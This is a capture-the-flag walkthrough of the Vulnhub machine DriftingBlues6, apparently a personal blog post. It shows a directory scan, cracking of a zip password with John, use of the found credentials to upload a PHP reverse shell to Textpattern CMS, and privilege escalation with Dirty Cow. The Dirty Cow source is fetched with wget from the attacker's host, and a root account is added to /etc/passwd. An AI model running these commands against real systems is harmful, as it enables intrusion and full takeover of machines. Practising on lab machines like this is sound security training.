Vulnhub: DriftingBlues6
DriftingBlues6
Since DriftingBlues7 was so quick I rolled into DriftingBlues6 and whaddya know - two successful Dirty Cow privescs in two days. What’s the world coming to?
Ports
HTTP only.
HTTP
robots.txt says:
dont forget to add .zip extension to your dir-brute
Okey dokey. It also disallows /textpattern/textpattern.
┌──(root💀kali)-[/opt/vulnhub/driftingblues6]
└─# feroxbuster -u http://192.168.1.219 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x txt,zip -C 403 --no-recursion
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.219
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💢 Status Code Filters │ [403]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [txt, zip]
🚫 Do Not Recurse │ true
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 5l 14w 110c http://192.168.1.219/robots
200 5l 14w 110c http://192.168.1.219/robots.txt
200 212l 1206w 53656c http://192.168.1.219/db
301 9l 28w 320c http://192.168.1.219/textpattern
200 2l 7w 179c http://192.168.1.219/spammer
200 2l 7w 179c http://192.168.1.219/spammer.zip
200 76l 75w 750c http://192.168.1.219/index
200 76l 75w 750c http://192.168.1.219/
[####################] - 56s 717600/717600 0s found:8 errors:0
[####################] - 55s 358800/358800 6444/s http://192.168.1.219Presumably this is what we are after?
┌──(root💀kali)-[/opt/vulnhub/driftingblues6]
└─# zip2john spammer.zip > spammer.john
ver 2.0 spammer.zip/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D
┌──(root💀kali)-[/opt/vulnhub/driftingblues6]
└─# john spammer.john -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4 (spammer.zip/creds.txt)
1g 0:00:00:00 DONE (2021-05-05 06:30) 33.33g/s 682666p/s 682666c/s 682666C/s christal..michelle4
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌──(root💀kali)-[/opt/vulnhub/driftingblues6]
└─# unzip spammer.zip
Archive: spammer.zip
[spammer.zip] creds.txt password:
extracting: creds.txt
┌──(root💀kali)-[/opt/vulnhub/driftingblues6]
└─# cat creds.txt
mayer:lionheart And why do we need this?
Because /textpattern/README.txt
Textpattern CMS 4.8.3
Has an unrestricted file upload vulnerability. I try the python script but it’s not working:
Traceback (most recent call last):
File “/opt/vulnhub/driftingblues6/exploit.py”, line 89, inscriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2] AttributeError: 'NoneType' object has no attribute 'replace'
Rather than try to debug this I just use the GUI to upload the PentestMonkey PHP reverse shell then access it at:
http://192.168.1.219/textpattern/files/shell.php
Privesc
Yes, it’s DirtyCow again. Linpeas gives me nothing but linux-exploit-suggester says DirtyCow is probable. Surely I’m not that lucky?
www-data@driftingblues:/tmp$ wget http://192.168.1.210:9090/dirty.c
wget http://192.168.1.210:9090/dirty.c
--2021-05-05 06:32:22-- http://192.168.1.210:9090/dirty.c
Connecting to 192.168.1.210:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4815 (4.7K) [text/x-csrc]
Saving to: `dirty.c'
100%[======================================>] 4,815 --.-K/s in 0s
2021-05-05 06:32:22 (1.22 GB/s) - `dirty.c' saved [4815/4815]
www-data@driftingblues:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@driftingblues:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: none
Complete line:
firefart:fixrfs1bF52dQ:0:0:pwned:/root:/bin/bash
mmap: 7f8de31db000As usual, it hangs at this point. We don’t have SSH so I can’t try that. Let’s kill our shell and start it again, fingers crossed:
──(root💀kali)-[/opt/vulnhub/driftingblues6]
└─# nc -nvlp 1234 1 ⨯
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.219] 57154
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
06:33:30 up 1:12, 0 users, load average: 1.81, 1.20, 1.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@driftingblues:/$ su firefart
su firefart
Password: none
firefart@driftingblues:/# cd /root
cd /root
firefart@driftingblues:~# ls -lash
ls -lash
total 20K
4.0K drwx------ 3 firefart root 4.0K Mar 17 10:36 .
4.0K drwxr-xr-x 23 firefart root 4.0K Mar 17 10:09 ..
4.0K drwx------ 2 firefart root 4.0K Mar 17 10:10 .aptitude
4.0K -rw------- 1 firefart root 165 Mar 17 10:36 .bash_history
4.0K -r-x------ 1 firefart root 1.8K Mar 17 10:36 flag.txt
firefart@driftingblues:~# cat flag.txt
cat flag.txt
# ASCII art removed
congratulations!
firefart@driftingblues:~# id;hostname;date
id;hostname;date
uid=0(firefart) gid=0(root) groups=0(root)
driftingblues
Wed May 5 06:34:03 CDT 2021
firefart@driftingblues:~#